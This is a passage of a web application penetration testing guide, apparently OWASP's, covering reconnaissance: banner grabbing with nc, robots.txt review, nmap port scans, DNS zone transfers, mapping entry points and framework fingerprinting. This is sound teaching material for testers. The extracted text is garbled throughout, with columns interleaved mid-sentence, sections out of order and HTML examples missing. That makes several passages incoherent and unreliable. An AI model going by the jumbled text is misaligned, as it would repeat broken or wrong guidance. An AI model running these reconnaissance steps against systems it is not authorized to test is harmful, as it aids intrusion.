Sun, 15 Jun 2003 17:10: 49 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT ETag: 32417-c4-3e5d8a83 Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/HTML Response from IIS 5.0 $ nc iis.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com/Default.htm Date: Fri, 01 Jan 1999 20:13: 52 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMT ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 Response from Netscape Enterprise 4.1 $ nc netscape.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:01: 40 GMT Content-type: text/HTML Last-modified: Wed, 31 Jul 2002 15:37: 56 GMT Content-length: 57 Accept-ranges: bytes Connection: close 31 Web Application Penetration Testing Response from a SunONE 6.1 $ nc sunone.example.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 15:23:37 GMT Content-length: 0 Content-type: text/html Date: Tue, 16 Jan 2007 15:20:26 GMT Last-Modified: Wed, 10 Jan 2007 09:58:26 GMT Connection: close We can notice that the ordering of the Date field and the Server field differs between Apache, Netscape Enterprise, and IIS. Malformed requests test Another useful test to execute involves sending malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses. Response from Apache 1.3.23 $ nc apache.example.com 80 GET / HTTP/3.0 HTTP/1.1 400 Bad Request Date: Sun, 15 Jun 2003 17:12: 37 GMT Server: Apache/1.3.23 Connection: close Transfer: chunked Content-Type: text/HTML; charset=iso-8859-1 Response from IIS 5.0 $ nc iis.example.com 80 GET / HTTP/3.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com/Default.htm Date: Fri, 01 Jan 1999 20:14: 02 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 Response from Netscape Enterprise 4.1 $ nc netscape.example.com 80 GET / HTTP/3.0 HTTP/1.1 505 HTTP Version Not Supported Server: Netscape-Enterprise/4.1 Date: Mon, 16 Jun 2003 06:04: 04 GMT Content-length: 140 Content-type: text/HTML Connection: close Response from a SunONE 6.1 $ nc sunone.example.com 80 GET / HTTP/3.0 HTTP/1.1 400 Bad request Server: Sun-ONE-Web-Server/6.1 Date: Tue, 16 Jan 2007 15:25:00 GMT Content-length: 0 Content-type: text/html Connection: close We notice that every server answers in a different way. The answer also differs in the version of the server. Similar observations can be done we create requests with a non-existent HTTP method/verb. Consider the following responses: Response from Apache 1.3.23 $ nc apache.example.com 80 GET / JUNK/1.0 HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:17: 47 GMT Server: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT ETag: 32417-c4-3e5d8a83 Accept-Ranges: bytes Content-Length: 196 Connection: close Content-Type: text/HTML Response from IIS 5.0 $ nc iis.example.com 80 GET / JUNK/1.0 HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.0 Date: Fri, 01 Jan 1999 20:14: 34 GMT Content-Type: text/HTML Content-Length: 87 32 Web Application Penetration Testing Response from Netscape Enterprise 4.1 $ nc netscape.example.com 80 GET / JUNK/1.0 of an online tool that often delivers a lot of information about target Web Servers, is Netcraft. With this tool we can retrieve information about operating system, web server used, Server Uptime, Netblock Owner, history of change related to Web server and O.S. An example is shown below: Bad request Bad request
Your browser sent to query this server could not understand. Response from a SunONE 6.1 $ nc sunone.example.com 80 GET / JUNK/1.0Bad request Bad request
Your browser sent a query this server could not understand. Tools • httprint - http://net-square.com/httprint.html • httprecon - http://www.computec.ch/projekte/httprecon/ • Netcraft - http://www.netcraft.com • Desenmascarame - http://desenmascara.me Automated Testing Rather than rely on manual banner grabbing and analysis of the web server headers, a tester can use automated tools to achieve the same results. There are many tests to carry out in order to accurately fingerprint a web server. Luckily, there are tools that automate these tests. “httprint” is one of such tools. httprint uses a signature dictionary that allows it to recognize the type and the version of the web server in use. An example of running httprint is shown below: OWASP Unmaskme Project is expected to become another online tool to do fingerprinting of any website with an overall interpretation of all the Web-metadata extracted. The idea behind this project is that anyone in charge of a website could test the metadata the site is showing to the world and assess it from a security point of view. While this project is still being developed, you can test a Spanish Proof of Concept of this idea. References Whitepapers • Saumil Shah: “An Introduction to HTTP fingerprinting” - http:// www.net-square.com/httprint_paper.html • Anant Shrivastava: “Web Application Finger Printing” - http:// anantshri.info/articles/web_app_finger_printing.html Remediation Protect the presentation layer web server behind a hardened reverse proxy. Obfuscate the presentation layer web server headers. • Apache • IIS Review Webserver Metafiles for Information Leakage (OTG-INFO-003) Summary This section describes how to test the robots.txt file for information leakage of the web application’s directory or folder path(s). Furthermore, the list of directories that are to be avoided by Spiders, Robots, or Crawlers can also be created as a dependency for Map execution paths through application (OTG-INFO-007) Online Testing Online tools can be used if the tester wishes to test more stealthily and doesn’t wish to directly connect to the target website. An example Test Objectives 1. Information leakage of the web application’s directory or folder path(s). 33 Web Application Penetration Testing 2. Create the list of directories that are to be avoided by Spiders, Robots, or Crawlers. How to Test robots.txt Web Spiders, Robots, or Crawlers retrieve a web page and then recursively traverse hyperlinks to retrieve further web content. Their accepted behavior is specified by the Robots Exclusion Protocol of the robots.txt file in the web root directory [1]. As an example, the beginning of the robots.txt file from http://www. google.com/robots.txt sampled on 11 August 2013 is quoted below: User-agent: * Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images Disallow: /catalogs ... The User-Agent directive refers to the specific web spider/robot/ crawler. For example the User-Agent: Googlebot refers to the spider from Google while “User-Agent: bingbot”[1] refers to crawler from Microsoft/Yahoo!. User-Agent: * in the example above applies to all web spiders/robots/crawlers [2] as quoted below: User-agent: * The Disallow directive specifies which resources are prohibited by spiders/robots/crawlers. In the example above, directories such as the following are prohibited: ... Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images Disallow: /catalogs ... Web spiders/robots/crawlers can intentionally ignore the Disallow directives specified in a robots.txt file [3], such as those from Social Networks[2] to ensure that shared linked are still valid. Hence, robots.txt should not be considered as a mechanism to enforce restrictions on how web content is accessed, stored, or republished by third parties. cmlh$ wget http://www.google.com/robots.txt --2013-08-11 14:40:36-- http://www.google.com/robots.txt Resolving www.google.com... 74.125.237.17, 74.125.237.18, 74.125.237.19, ... Connecting to www.google.com|74.125.237.17|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘robots.txt.1’ [ <=> ] 7,074 --.-K/s in 0s 2013-08-11 14:40:37 (59.7 MB/s) - ‘robots.txt’ saved [7074] cmlh$ head -n5 robots.txt User-agent: * Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images cmlh$ cmlh$ curl -O http://www.google.com/robots.txt % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 101 7074 0 7074 0 0 9410 0 --:--:-- --:--:-- --:--:-27312 cmlh$ head -n5 robots.txt User-agent: * Disallow: /search Disallow: /sdch Disallow: /groups Disallow: /images cmlh$ robots.txt in webroot - with rockspider “rockspider”[3] automates the creation of the initial scope for Spiders/ Robots/Crawlers of files and directories/folders of a web site. For example, to create the initial scope based on the Allowed: directive from www.google.com using “rockspider”[4]: cmlh$ ./rockspider.pl -www www.google.com “Rockspider” Alpha v0.1_2 robots.txt in webroot - with “wget” or “curl” Copyright 2013 Christian Heinrich Licensed under the Apache License, Version 2.0 The robots.txt file is retrieved from the web root directory of the web server. For example, to retrieve the robots.txt from www.google.com using “wget” or “curl”: 1. Downloading http://www.google.com/robots.txt 34 Web Application Penetration Testing 2. “robots.txt” saved as “www.google.com-robots.txt” 3. Sending Allow: URIs of www.google.com to web proxy i.e. 127.0.0.1:8080 /catalogs/about sent /catalogs/p? sent /news/directory sent ... 4. Done. cmlh$ Analyze robots.txt using Google Webmaster Tools Web site owners can use the Google “Analyze robots.txt” function to analyse the website as part of its “Google Webmaster Tools” (https:// www.google.com/webmasters/tools). This tool can assist with testing and the procedure is as follows: 1. Sign into Google Webmaster Tools with a Google account. 2. On the dashboard, write the URL for the site to be analyzed. 3. Choose between the available methods and follow the on screen instruction. META Tag tags are located within the HEAD section of each HTML Document and should be consistent across a web site in the likely event that the robot/spider/crawler start point does not begin from a document link other than webroot i.e. a “deep link”[5]. If there is no “” entry then the “Robots Exclusion Protocol” defaults to “INDEX,FOLLOW” respectively. Therefore, the other two valid entries defined by the “Robots Exclusion Protocol” are prefixed with “NO...” i.e. “NOINDEX” and “NOFOLLOW”. Web spiders/robots/crawlers can intentionally ignore the “ Tags should not be considered the primary mechanism, rather a complementary control to robots.txt. Tags - with Burp Based on the Disallow directive(s) listed within the robots.txt file in webroot, a regular expression search for “ Tag specified by the “Robots Exclusion Protocol” yet “Disallow: /ac.php” is listed in robots.txt. Tools • Browser (View Source function) • curl • wget • rockspider[7] References Whitepapers [1] “The Web Robots Pages” - http://www.robotstxt.org/ [2] “Block and Remove Pages Using a robots.txt File” - https://support. google.com/webmasters/answer/156449 [3] “(ISC)2 Blog: The Attack of the Spiders from the Clouds” - http:// blog.isc2.org/isc2_blog/2008/07/the-attack-of-t.html [4] “Telstra customer database exposed” - http://www.smh. com.au/it-pro/security-it/telstra-customer-database-exposed-20111209-1on60.html Enumerate Applications on Webserver (OTG-INFO-004) Summary A paramount step in testing for web application vulnerabilities is to find out which particular applications are hosted on a web server. Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to exploit data. In addition, many applications are often misconfigured or not updated, due to the perception that they are only used “internally” and therefore no threat exists. With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites or applications whose symbolic names resolve to the same IP address. This scenario is not limited to hosting environments, but also applies to ordinary corporate environments as well. Security professionals are sometimes given a set of IP addresses as a target to test. It is arguable that this scenario is more akin to a penetration test-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target. The problem is that the given IP address hosts an HTTP service on port 80, but if a tester should access it by specifying the IP address (which is all they know) it reports “No web server configured at this address” or a similar message. But that system could “hide” a number of web applications, associated to unrelated symbolic (DNS) names. Obviously, the extent of the analysis is deeply affected by the tester tests all applications or only tests the applications that they are aware of. Sometimes, the target specification is richer. The tester may be given a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e., it could omit some symbolic names and the client may not even being aware of that (this is more likely to happen in large organizations). Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www. example.com/some-strange-URL), which are not referenced else- 35 Web Application Penetration Testing where. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces). To address these issues, it is necessary to perform web application discovery. Test Objectives Enumerate the applications within scope that exist on a web server How to Test Black Box Testing Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist of a set of DNS symbolic names or a mix of the two. This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should identify all the applications accessible through the given target. The following examples examine a few techniques that can be employed to achieve this goal. Note: Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as 192.168.1.100), which, unless indicated otherwise, represent generic IP addresses and are used only for anonymity purposes. There are three factors influencing how many applications are related to a given DNS name (or an IP address): 1. Different base URL The obvious entry point for a web application is www.example. com, i.e., with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, even though this is the most common situation, there is nothing forcing the application to start at “/”. For example, the same symbolic name may be associated to three web applications such as: http://www.example.com/url1 http:// www.example.com/url2 http://www.example.com/url3 In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden”, unless the tester explicitly knows how to reach them, i.e., the tester knows url1, url2 or url3. There is usually no need to publish web applications in this way, unless the owner doesn’t want them to be accessible in a standard way, and is prepared to inform the users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location is not explicitly advertised. 2. Non-standard ports While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www. example.com:port/. For example, http://www.example.com:20000/. 3. Virtual hosts DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address 192.168.1.100 might be associated to DNS names www.example.com, helpdesk.example. com, webmail.example.com. It is not necessary that all the names belong to the same DNS domain. This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 Host: header [1]. One would not suspect the existence of other web applications in addition to the obvious www.example.com, unless they know of helpdesk.example.com and webmail.example.com. Approaches to address issue 1 - non-standard URLs There is no way to fully ascertain the existence of non-standardnamed web applications. Being non-standard, there is no fixed criteria governing the naming convention, however there are a number of techniques that the tester can use to gain some additional insight. First, if the web server is mis-configured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. Second, these applications may be referenced by other web pages and there is a chance that they have been spidered and indexed by web search engines. If testers suspect the existence of such “hidden” applications on www.example.com they could search using the site operator and examining the result of a query for “site: www.example. com”. Among the returned URLs there could be one pointing to such a non-obvious application. Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from URLs such as https://www.example.com/webmail, https://webmail.example.com/, or https://mail.example.com/. The same holds for administrative interfaces, which may be published at hidden URLs (for example, a Tomcat administrative interface), and yet not referenced anywhere. So doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect. Approaches to address issue 2 - non-standard ports It is easy to check for the existence of web applications on non-standard ports. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space. For example, the following command will look up, with a TCP connect scan, all open ports on IP 192.168.1.100 and will try to determine what services are bound to them (only essential switches are shown – nmap features a broad set of options, whose discussion is out of scope): nmap –PN –sT –sV –p0-65535 192.168.1.100 It is sufficient to examine the output and look for http or the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command coullook like: 36 Web Application Penetration Testing 901/tcp open http Samba SWAT administration server 1241/tcp open ssl Nessus security scanner 3690/tcp open unknown 8000/tcp open http-alt? 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 From this example, one see that: • There is an Apache http server running on port 80. • It looks like there is an https server on port 443 (but this needs to be confirmed, for example, by visiting https://192.168.1.100 with a browser). • On port 901 there is a Samba SWAT web interface. • The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon. • Port 3690 features an unspecified service (nmap gives back its fingerprint - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents). • Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let’s examine this issue: Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL This confirms that in fact it is an HTTP server. Alternatively, testers could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers). • Apache Tomcat running on port 8080. The same task may be performed by vulnerability scanners, but first check that the scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided it is instructed to scan all the ports), and will provide, with respect to nmap, a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications or web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface). Approaches to address issue 3 - virtual hosts There are a number of techniques which may be used to identify DNS names associated to a given IP address x.y.z.t. DNS zone transfers This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try. First of all, testers must determine the name servers serving x.y.z.t. If a symbolic name is known for x.y.z.t (let it be www. example.com), its name servers can be determined by means of tools such as nslookup, host, or dig, by requesting DNS NS records. If no symbolic names are known for x.y.z.t, but the target definition contains at least a symbolic name, testers may try to apply the same process and query the name server of that name (hoping that x.y.z.t will be served as well by that name server). For example, if the target consists of the IP address x.y.z.t and the name mail.example.com, determine the name servers for domain example.com. The following example shows how to identify the name servers for www.owasp.org by using the host command: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. A zone transfer may now be requested to the name servers for domain example.com. If the tester is lucky, they will get back a list of the DNS entries for this domain. This will include the obvious www.example.com and the not-so-obvious helpdesk.example.com and webmail. example.com (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. Trying to request a zone transfer for owasp.org from one of its name servers: $ host -l www.owasp.org ns1.secure.net Using domain server: Name: ns1.secure.net Address: 192.220.124.10#53 Aliases: Host www.owasp.org not found: 5(REFUSED) ; Transfer failed. DNS inverse queries This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If the testers are lucky, they may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not guaranteed. Web-based DNS searches This kind of search is akin to DNS zone transfer, but relies on webbased services that enable name-based searches on DNS. One such service is the Netcraft Search DNS service, available at http:// searchdns.netcraft.com/?host. The tester may query for a list of names belonging to your domain of choice, such as example.com. Then they will check whether the names they obtained are pertinent to the target they are examining. 37 Web Application Penetration Testing Reverse-IP services Reverse-IP services are similar to DNS inverse queries, with the difference that the testers query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis. Gray Box Testing Not applicable. The methodology remains the same as listed in Black Box testing no matter how much information the tester starts with. Tools MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) • DNS lookup tools such as nslookup, dig and similar. • Search engines (Google, Bing and other major search engines). • Specialized DNS-related web-based search service: see text. • Nmap - http://www.insecure.org • Nessus Vulnerability Scanner - http://www.nessus.org • Nikto - http://www.cirt.net/nikto2 Webhosting info: http://whois.webhosting.info/ syntax: http:// whois.webhosting.info/x.x.x.x References Whitepapers [1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 DNSstuff: http://www.dnsstuff.com/ (multiple services available) Review webpage comments and metadata for information leakage (OTG-INFO-005) Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (requires free membership) http://www.net-square.com/mspawn.html (multiple queries on domains and IP addresses, requires installation) tomDNS: http://www.tomdns.net/index.php (some services are still private at the time of writing) SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse-IP/domain lookup) The following example shows the result of a query to one of the above reverse-IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed. Summary It is very common, and even recommended, for programmers to include detailed comments and metadata on their source code. However, comments and metadata included into the HTML code might reveal internal information that should not be available to potential attackers. Comments and metadata review should be done in order to determine if any information is being leaked. Test Objectives Review webpage comments and metadata to better understand the application and to find any information leakage. How to Test HTML comments are often used by the developers to include debugging information about the application. Sometimes they forget about the comments and they leave them on in production. Testers should look for HTML comments which start with “”. Black Box Testing Check HTML source code for comments containing sensitive information that can help the attacker gain more insight about the application. It might be SQL code, usernames and passwords, internal IP addresses, or debugging information. ... Googling Following information gathering from the previous techniques, testers can rely on search engines to possibly refine and increment their analysis. This may yield evidence of additional symbolic names belonging to the target, or applications accessible via non-obvious URLs. For instance, considering the previous example regarding www. owasp.org, the tester could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of webgoat.org, webscarab.com, and webscarab. net. Googling techniques are explained in Testing: Spiders, Robots, and Crawlers.... The tester may even find something like this: 38 Web Application Penetration Testing Check HTML version information for valid version numbers and Data Type Definition (DTD) URLs will advise robots to not index and not follow links on the HTML page containing the tag. • “strict.dtd” -- default strict DTD • “loose.dtd” -- loose DTD • “frameset.dtd” -- DTD for frameset documents The Platform for Internet Content Selection (PICS) and Protocol for Web Description Resources (POWDER) provide infrastructure for associating meta data with Internet content. Some Meta tags do not provide active attack vectors but instead allow an attacker to profile an application to Gray Box Testing Not applicable. Some Meta tags alter HTTP response headers, such as http-equiv that sets an HTTP response header based on the the content attribute of a meta element, such as: which will result in the HTTP header: Expires: Fri, 21 Dec 2012 12:34:56 GMT and will result in Cache-Control: no-cache Test to see if this can be used to conduct injection attacks (e.g. CRLF attack). It can also help determine the level of data leakage via the browser cache. A common (but not WCAG compliant) Meta tag is the refresh. A common use for Meta tag is to specify keywords that a search engine may use to improve the quality of search results. Although most web servers manage search engine indexing via the robots.txt file, it can also be managed by Meta tags. The tag below Tools • Wget • Browser “view source” function • Eyeballs • Curl References Whitepapers [1] http://www.w3.org/TR/1999/REC-html401-19991224 HTML version 4.01 [2] http://www.w3.org/TR/2010/REC-xhtml-basic-20101123/ XHTML (for small devices) [3] http://www.w3.org/TR/html5/ HTML version 5 Identify application entry points (OTG-INFO-006) Summary Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken, as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within the application that should be investigated once enumeration and mapping have been completed. Test Objectives Understand how requests are formed and typical responses from the application How to Test Before any testing begins, the tester should always get a good understanding of the application and how the user and browser communicates with it. As the tester walks through the application, they should pay special attention to all HTTP requests (GET and POST Methods, also known as Verbs), as well as every parameter and form field that is passed to the application. In addition, they should pay attention to when GET requests are used and when POST requests are used to pass parameters to the application. It is very common that GET requests are used, but when sensitive information is passed, it is often done within the body of a POST request. Note that to see the parameters sent in a POST request, the tester will need to use a tool such as an intercepting proxy (for example, OWASP: Zed Attack Proxy (ZAP)) or a browser plug-in. Within the POST request, the tester should also make special note of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such as state information, quantity of items, the price of items, that the developer never intended for you to see or change. 39 Web Application Penetration Testing In the author’s experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the testing. The proxy will keep track of every request and response between the tester and the application as they u walk through it. Additionally, at this point, testers usually trap every request and response so that they can see exactly every header, parameter, etc. that is being passed to the application and what is being returned. This can be quite tedious at times, especially on large interactive sites (think of a banking application). However, experience will show what to look for and this phase can be significantly reduced. As the tester walks through the application, they should take note of any interesting parameters in the URL, custom headers, or body of the requests/responses, and save them in a spreadsheet. The spreadsheet should include the page requested (it might be good to also add the request number from the proxy, for future reference), the interesting parameters, the type of request (POST/GET), if access is authenticated/unauthenticated, if SSL is used, if it’s part of a multi-step process, and any other relevant notes. Once they have every area of the application mapped out, then they can go through the application and test each of the areas that they have identified and make notes for what worked and what didn’t work. The rest of this guide will identify how to test each of these areas of interest, but this section must be undertaken before any of the actual testing can commence. Below are some points of interests for all requests and responses. Within the requests section, focus on the GET and POST methods, as these appear the majority of the requests. Note that other methods, such as PUT and DELETE, can be used. Often, these more rare requests, if allowed, can expose vulnerabilities. There is a special section in this guide dedicated for testing these HTTP methods. Requests: • Identify where GETs are used and where POSTs are used. • Identify all parameters used in a POST request (these are in the body of the request). • Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren’t seen unless a proxy or view the HTML source code is used. In addition, the next page shown, its data, and the level of access can all be different depending on the value of the hidden parameter(s). • Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark). • Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &, ~, :, or any other special character or encoding. • A special note when it comes to identifying multiple parameters in one string or within a POST request is that some or all of the parameters will be needed to execute the attacks. The tester needs to identify all of the parameters (even if encoded or encrypted) and identify which ones are processed by the application. Later sections of the guide will identify how to test these parameters. At this point, just make sure each one of them is identified. • Also pay attention to any additional or custom type headers not typically seen (such as debug=False). Responses: • Identify where new cookies are set (Set-Cookie header), modified, or added to. • Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests). • Also note where any interesting headers are used. For example, “Server: BIG-IP” indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used. Black Box Testing Testing for application entry points: The following are two examples on how to check for application entry points. EXAMPLE 1 This example shows a GET request that would purchase an item from an online shopping application. GET https://x.x.x.x/shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x Host: x.x.x.x Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy Result Expected: Here the tester would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or used for session state). EXAMPLE 2 This example shows a POST request that would log you into an application. POST https://x.x.x.x/KevinNotSoGoodApp/authenticate.asp?service=login Host: x.x.x.x Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA== CustomCookie=00my00trusted00ip00is00x.x.x.x00 Body of the POST message: user=admin&pass=pass123&debug=true&fromtrustIP=true Result Expected: In this example the tester would note all the parameters as they have before but notice that the parameters are passed in the body of the message and not in the URL. Additionally, note that there is a custom cookie that is being used. 40 Web Application Penetration Testing Gray Box Testing Testing for application entry points via a Gray Box methodology would consist of everything already identified above with one addition. In cases where there are external sources from which the application receives data and processes it (such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers) a meeting with the application developers could identify any functions that would accept or expect user input and how they are formatted. For example, the developer could help in understanding how to formulate a correct SOAP request that the application would accept and where the web service resides (if the web service or any other function hasn’t already been identified during the black box testing). Tools Intercepting Proxy: • OWASP: Zed Attack Proxy (ZAP) • OWASP: WebScarab • Burp Suite • CAT Browser Plug-in: • TamperIE for Internet Explorer • Tamper Data for Firefox References Whitepapers • RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 http://tools.ietf.org/html/rfc2616 flow, transformation and use of data throughout an application. • Race - tests multiple concurrent instances of the application manipulating the same data. The trade off as to what method is used and to what degree each method is used should be negotiated with the application owner. Simpler approaches could also be adopted, including asking the application owner what functions or code sections they are particularly concerned about and how those code segments can be reached. Black Box Testing To demonstrate code coverage to the application owner, the tester can start with a spreadsheet and document all the links discovered by spidering the application (either manually or automatically). Then the tester can look more closely at decision points in the application and investigate how many significant code paths are discovered. These should then be documented in the spreadsheet with URLs, prose and screenshot descriptions of the paths discovered. Gray/White Box testing Ensuring sufficient code coverage for the application owner is far easier with the gray and white box approach to testing. Information solicited by and provided to the tester will ensure the minimum requirements for code coverage are met. Example Automatic Spidering The automatic spider is a tool used to automatically discover new resources (URLs) on a particular website. It begins with a list of URLs to visit, called the seeds, which depends on how the Spider is started. While there are a lot of Spidering tools, the following example uses the Zed Attack Proxy (ZAP): Map execution paths through application (OTG-INFO-007) Summary Before commencing security testing, understanding the structure of the application is paramount. Without a thorough understanding of the layout of the application, it is unlkely that it will be tested thoroughly. Test Objectives Map the target application and understand the principal workflows. How to Test In black box testing it is extremely difficult to test the entire code base. Not just because the tester has no view of the code paths through the application, but even if they did, to test all code paths would be very time consuming. One way to reconcile this is to document what code paths were discovered and tested. There are several ways to approach the testing and measurement of code coverage: • Path - test each of the paths through an application that includes combinatorial and boundary value analysis testing for each decision path. While this approach offers thoroughness, the number of testable paths grows exponentially with each decision branch. • Data flow (or taint analysis) - tests the assignment of variables via external interaction (normally users). Focuses on mapping the ZAP offers the following automatic spidering features, which can be selected based on the tester’s needs: • Spider Site - The seed list contains all the existing URIs already found for the selected site. • Spider Subtree - The seed list contains all the existing URIs already found and present in the subtree of the selected node. • Spider URL - The seed list contains only the URI corresponding to the selected node (in the Site Tree). • Spider all in Scope - The seed list contains all the URIs the user has selected as being ‘In Scope’. Tools • Zed Attack Proxy (ZAP) 41 Web Application Penetration Testing • List of spreadsheet software • Diagramming software References Whitepapers [1] http://en.wikipedia.org/wiki/Code_coverage Fingerprint Web Application Framework (OTG-INFO-008) Summary Web framework[*] fingerprinting is an important subtask of the information gathering process. Knowing the type of framework can automatically give a great advantage if such a framework has already been tested by the penetration tester. It is not only the known vulnerabilities in unpatched versions but specific misconfigurations in the framework and known file structure that makes the fingerprinting process so important. Several different vendors and versions of web frameworks are widely used. Information about it significantly helps in the testing process, and can also help in changing the course of the test. Such information can be derived by careful analysis of certain common locations. Most of the web frameworks have several markers in those locations which help an attacker to spot them. This is basically what all automatic tools do, they look for a marker from a predefined location and then compare it to the database of known signatures. For better accuracy several markers are usually used. [*] Please note that this article makes no differentiation between Web Application Frameworks (WAF) and Content Management Systems (CMS). This has been done to make it convenient to fingerprint both of them in one chapter. Furthermore, both categories are referenced as web frameworks. Test Objectives To define type of used web framework so as to have a better understanding of the security testing methodology. How to Test Black Box testing There are several most common locations to look in in order to define the current framework: • HTTP headers • Cookies • HTML source code • Specific files and folders HTTP headers The most basic form of identifying a web framework is to look at the X-Powered-By field in the HTTP response header. Many tools can be used to fingerprint a target. The simplest one is netcat utility. Consider the following HTTP Request-Response: $ nc 127.0.0.1 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: nginx/1.0.14 Date: Sat, 07 Sep 2013 08:19:15 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Vary: Accept-Encoding X-Powered-By: Mono From the X-Powered-By field, we understand that the web application framework is likely to be Mono. 